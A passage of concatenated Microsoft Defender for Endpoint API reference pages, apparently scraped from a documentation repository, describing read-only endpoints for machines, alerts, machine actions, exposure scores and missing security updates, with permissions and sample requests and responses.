------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get machine by ID API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-Retrieves specific [Machine](machine.md) by its device ID or computer name.
-
-## Limitations
-
-1. You can get devices last seen according to your configured retention policy.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account) | Machine.Read | 'Read machine information'
-Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/machines/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and device exists - 200 OK with the [machine](machine.md) entity in the body.
-If machine with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07
-```
-
-### Response example
-
-Here's an example of the response.
-
-```http
-HTTP/1.1 200 OK
-Content-type: application/json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Machine",
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2018-08-02T14:55:03.7791856Z",
- "osPlatform": "Windows10" "Windows11",
- "version": "1709",
- "osProcessor": "x64",
- "lastIpAddress": "172.17.230.209",
- "lastExternalIpAddress": "167.220.196.71",
- "osBuild": 18209,
- "healthStatus": "Active",
- "rbacGroupId": 140,
- "rbacGroupName": "The-A-Team",
- "riskScore": "Low",
- "exposureLevel": "Medium",
- "isAadJoined": true,
- "aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
- "machineTags": [ "test tag 1", "test tag 2" ]
-}
-```
security Get Machine Group Exposure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machine-group-exposure-score.md
- Title: List exposure score by device group
-description: Retrieves a list of exposure scores by device group.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List exposure score by device group
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves the exposure score for each machine group.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Score.Read.All|'Read Threat and Vulnerability Management score'
-Delegated (work or school account)|Score.Read|'Read Threat and Vulnerability Management score'
-
-## HTTP request
-
-```http
-GET /api/exposureScore/ByMachineGroups
-```
-
-## Request headers
-
-Name|Type|Description
-||
-|Authorization|String|Bearer {token}.**Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, with a list of exposure score per device group data in the response body.
-
-## Example
-
-### Example request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/exposureScore/ByMachineGroups
-```
-
-### Example response
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#ExposureScore",
- "value": [
- {
- "time": "2019-12-03T09:51:28.214338Z",
- "score": 41.38041766305988,
- "rbacGroupName": "GroupOne"
- },
- {
- "time": "2019-12-03T09:51:28.2143399Z",
- "score": 37.403726933165366,
- "rbacGroupName": "GroupTwo"
- }
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management exposure score](/microsoft-365/security/defender-endpoint/tvm-exposure-score)
security Get Machine Log On Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machine-log-on-users.md
- Title: Get machine logon users API
-description: Learn how to use the Get machine logon users API to retrieve a collection of logged on users on a device in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get machine logon users API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-Retrieves a collection of logged on users on a specific device.
-
-## Limitations
-1. You can query on alerts last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application |User.Read.All |'Read user profiles'
-Delegated (work or school account) | User.Read.All | 'Read user profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data'. For more information, see [Create and manage roles](../user-roles.md).
-> - Response will include users only if the device is visible to the user, based on device group settings. For more information, see [Create and manage device groups](../machine-groups.md).
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/machines/{id}/logonusers
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and device exists - 200 OK with list of [user](user.md) entities in the body. If device wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/logonusers
-```
-
-### Response
-
-Here's an example of the response.
-
-```http
-HTTP/1.1 200 OK
-Content-type: application/json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Users",
- "value": [
- {
- "id": "contoso\\user1",
- "accountName": "user1",
- "accountDomain": "contoso",
- "firstSeen": "2019-12-18T08:02:54Z",
- "lastSeen": "2020-01-06T08:01:48Z",
- "logonTypes": "Interactive",
- "isDomainAdmin": true,
- "isOnlyNetworkUser": false
- },
- ...
- ]
-}
-```
security Get Machine Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machine-related-alerts.md
- Title: Get machine related alerts API
-description: Learn how to use the Get machine related alerts API. This API allows you to retrieve all alerts that are related to a specific device in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get machine related alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves all [Alerts](alerts.md) related to a specific device.
-
-## Limitations
-
-1. You can query on devices last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.Read.All|'Read all alerts'
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account) | Alert.Read | 'Read alerts'
-Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data'. For more information about permissions, see [Create and manage roles](../user-roles.md).
-> - The user needs to have access to the device, based on device group settings. For more information about device group settings, see [Create and manage device groups](../machine-groups.md).
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-## HTTP request
-
-```http
-GET /api/machines/{id}/alerts
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and device exists: 200 OK with list of [alert](alerts.md) entities in the body. If device was not found: 404 Not Found.
security Get Machineaction Object https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machineaction-object.md
- Title: Get MachineAction object API
-description: Learn how to use the Get MachineAction API to retrieve a specific Machine Action by its ID in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get machineAction API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves specific [Machine Action](machineaction.md) by its ID.
-
-## Limitations
--- Rate limitations for this API are 100 calls per minute and 1500 calls per hour.-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-
-## HTTP request
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machineactions/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with a [Machine Action](machineaction.md) entity. If machine action entity with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Example request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machineactions/2e9da30d-27f6-4208-81f2-9cd3d67893ba
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-HTTP/1.1 200 Ok
-Content-type: application/json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions/$entity",
- "id": "5382f7ea-7557-4ab7-9782-d50480024a4e",
- "type": "Isolate",
- "scope": "Selective",
- "requestor": "Analyst@TestPrd.onmicrosoft.com",
- "requestorComment": "test for docs",
- "status": "Succeeded",
- "machineId": "7b1f4967d9728e5aa3c06a9e617a22a4a5a17378",
- "computerDnsName": "desktop-test",
- "creationDateTimeUtc": "2019-01-02T14:39:38.2262283Z",
- "lastUpdateDateTimeUtc": "2019-01-02T14:40:44.6596267Z",
- "relatedFileInfo": null
-}
-```
security Get Machineactions Collection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machineactions-collection.md
- Title: List machineActions API
-description: Learn how to use the List MachineActions API to retrieve a collection of Machine Actions in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List MachineActions API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of [Machine Actions](machineaction.md).
-
-Supports [OData V4 queries](https://www.odata.org/documentation/).
-
-The OData's `$filter` query is supported on: `id`, `status`, `machineId`, `type`, `requestor`, and `creationDateTimeUtc` properties.
-
-`$stop` with max value of 10,000
-
-`$skip`
-
-See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
-
-## Limitations
-
-1. Maximum page size is 10,000.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-
-## HTTP request
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machineactions
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with a collection of [machineAction](machineaction.md) entities.
-
-## Example 1
-
-### Example 1 request
-
-Here is an example of the request on an organization that has three MachineActions.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machineactions
-```
-
-### Example 1 response
-
-Here is an example of the response.
-
-```json
-HTTP/1.1 200 Ok
-Content-type: application/json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
- "value": [
- {
- "id": "69dc3630-1ccc-4342-acf3-35286eec741d",
- "type": "CollectInvestigationPackage",
- "scope": null,
- "requestor": "Analyst@contoso.com",
- "requestorComment": "test",
- "status": "Succeeded",
- "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
- "computerDnsName": "desktop-39g9tgl",
- "creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
- "lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
- "relatedFileInfo": null
- },
- {
- "id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
- "type": "RunAntiVirusScan",
- "scope": "Full",
- "requestor": "Analyst@contoso.com",
- "requestorComment": "Check machine for viruses due to alert 3212",
- "status": "Succeeded",
- "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
- "computerDnsName": "desktop-39g9tgl",
- "creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
- "lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
- "relatedFileInfo": null
- },
- {
- "id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
- "type": "StopAndQuarantineFile",
- "scope": null,
- "requestor": "Analyst@contoso.com",
- "requestorComment": "test",
- "status": "Succeeded",
- "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
- "computerDnsName": "desktop-39g9tgl",
- "creationDateTimeUtc": "2018-12-04T12:15:40.6052029Z",
- "lastUpdateTimeUtc": "2018-12-04T12:16:14.2899973Z",
- "relatedFileInfo": {
- "fileIdentifier": "a0c659857ccbe457fdaf5fe21d54efdcbf6f6508",
- "fileIdentifierType": "Sha1"
- }
- }
- ]
-}
-```
-
-## Example 2
-
-### Example 2 request
-
-Here is an example of a request that filters the MachineActions by machine ID and shows the latest two MachineActions.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machineactions?$filter=machineId eq 'f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f'&$top=2
-```
-
-### Example 2 response
-
-Here is an example of the response.
-
-```json
-HTTP/1.1 200 Ok
-Content-type: application/json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
- "value": [
- {
- "id": "69dc3630-1ccc-4342-acf3-35286eec741d",
- "type": "CollectInvestigationPackage",
- "scope": null,
- "requestor": "Analyst@contoso.com",
- "requestorComment": "test",
- "status": "Succeeded",
- "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
- "computerDnsName": "desktop-39g9tgl",
- "creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
- "lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
- "relatedFileInfo": null
- },
- {
- "id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
- "type": "RunAntiVirusScan",
- "scope": "Full",
- "requestor": "Analyst@contoso.com",
- "requestorComment": "Check machine for viruses due to alert 3212",
- "status": "Succeeded",
- "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
- "computerDnsName": "desktop-39g9tgl",
- "creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
- "lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
- "relatedFileInfo": null
- }
- ]
-}
-```
-
-## Related topics
--- [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security Get Machines By Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machines-by-software.md
- Title: List devices by software
-description: Retrieve a list of devices that has this software installed.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List devices by software
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieve a list of device references that has this software installed.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/Software/{Id}/machineReferences
-```
-
-## Request headers
-
-|Name|Type|Description
-||||
-|Authorization|String|Bearer {token}.**Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK and a list of devices with the software installed in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/machineReferences
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
- "value": [
- {
- "id": "7c7e1896fa39efb0a32a2cf421d837af1b9bf762",
- "computerDnsName": "dave_desktop",
- "osPlatform": "Windows10" "Windows11",
- "rbacGroupName": "GroupTwo"
- },
- {
- "id": "7d5cc2e7c305e4a0a290392abf6707f9888fda0d",
- "computerDnsName": "jane_PC",
- "osPlatform": "Windows10" "Windows11",
- "rbacGroupName": "GroupTwo"
- }
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Machines By Vulnerability https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machines-by-vulnerability.md
- Title: List devices by vulnerability
-description: Retrieves a list of devices affected by a vulnerability.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List devices by vulnerability
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves a list of devices affected by a vulnerability.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management vulnerability information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management vulnerability information'
-
-## HTTP request
-
-```http
-GET /api/vulnerabilities/{cveId}/machineReferences
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the vulnerability information in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/vulnerabilities/CVE-2019-0608/machineReferences
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
- "value": [
- {
- "id": "235a2e6278c63fcf85bab9c370396972c58843de",
- "computerDnsName": "h1mkn_PC",
- "osPlatform": "Windows10" "Windows11",
- "rbacGroupName": "GroupTwo"
- },
- {
- "id": "afb3f807d1a185ac66668f493af028385bfca184",
- "computerDnsName": "chat_Desk ",
- "osPlatform": "Windows10" "Windows11",
- "rbacGroupName": "GroupTwo"
- }
- ...
- ]
- }
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-machines.md
- Title: List machines API
-description: Learn how to use the List machines API to retrieve a collection of machines that have communicated with Microsoft Defender for Endpoint cloud.
-------- m365-security-- tier3-- must-keep-- Previously updated : 04/17/2024--
-# List machines API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of [Machines](machine.md) that have communicated with Microsoft Defender for Endpoint cloud.
-
-Supports [OData V4 queries](https://www.odata.org/documentation/).
-
-The OData's `$filter` query is supported on: `computerDnsName`, `id`, `version`, `deviceValue`, `aadDeviceId`, `machineTags`, `lastSeen`,`exposureLevel`, `onboardingStatus`, `lastIpAddress`, `healthStatus`, `osPlatform`, `riskScore` and `rbacGroupId`.
-<br>```$top``` with max value of 10,000
-<br>```$skip```
-See examples at [OData queries with Defender for Endpoint](exposed-apis-odata-samples.md)
-
-## Limitations
--- You can get devices last seen according to your configured retention period.-- Maximum page size is 10,000.-- Rate limitations for this API are 100 calls per minute and 1500 calls per hour. -
-## Permissions
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - Response will include only devices, that the user have access to, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET https://api.security.microsoft.com/api/machines
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and machines exists - 200 OK with list of [machine](machine.md) entities in the body. If no recent machines - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/machines
-```
-
-### Response example
-
-Here's an example of the response.
-
-```http
-HTTP/1.1 200 OK
-Content-type: application/json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Machines",
- "value": [
- {
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2018-08-02T14:55:03.7791856Z",
- "osPlatform": "Windows10" "Windows11",
- "version": "1709",
- "osProcessor": "x64",
- "lastIpAddress": "172.17.230.209",
- "lastExternalIpAddress": "167.220.196.71",
- "osBuild": 18209,
- "healthStatus": "Active",
- "rbacGroupId": 140,
- "rbacGroupName": "The-A-Team",
- "riskScore": "Low",
- "exposureLevel": "Medium",
- "isAadJoined": true,
- "aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
- "machineTags": [ "test tag 1", "test tag 2" ]
- }
- ...
- ]
-}
-```
-
-## Related articles
--- [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)-
security Get Missing Kbs Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-missing-kbs-machine.md
- Title: Get missing KBs by device ID
-description: Retrieves missing security updates by device ID
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get missing KBs by device ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
---
-Retrieves missing KBs (security updates) by device ID
-
-## HTTP request
-
-```http
-GET /api/machines/{machineId}/getmissingkbs
-```
-## Permissions
-
-The following permission is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type | Permission | Permission display name
-:|:|:
-Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
-
-## Request header
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, with the specified device missing kb data in the body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/2339ad14a01bd0299afb93dfa2550136057bff96/getmissingkbs
-```
-
-### Response
-
-Here is an example of the response.
--
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicProductFixDto)",
- "value": [
- {
- "id": "4540673",
- "name": "March 2020 Security Updates",
- "productsNames": [
- "windows_10",
- "edge",
- "internet_explorer"
- ],
- "url": "https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540673",
- "machineMissedOn": 1,
- "cveAddressed": 97
- }
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Missing Kbs Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-missing-kbs-software.md
- Title: Get missing KBs by software ID
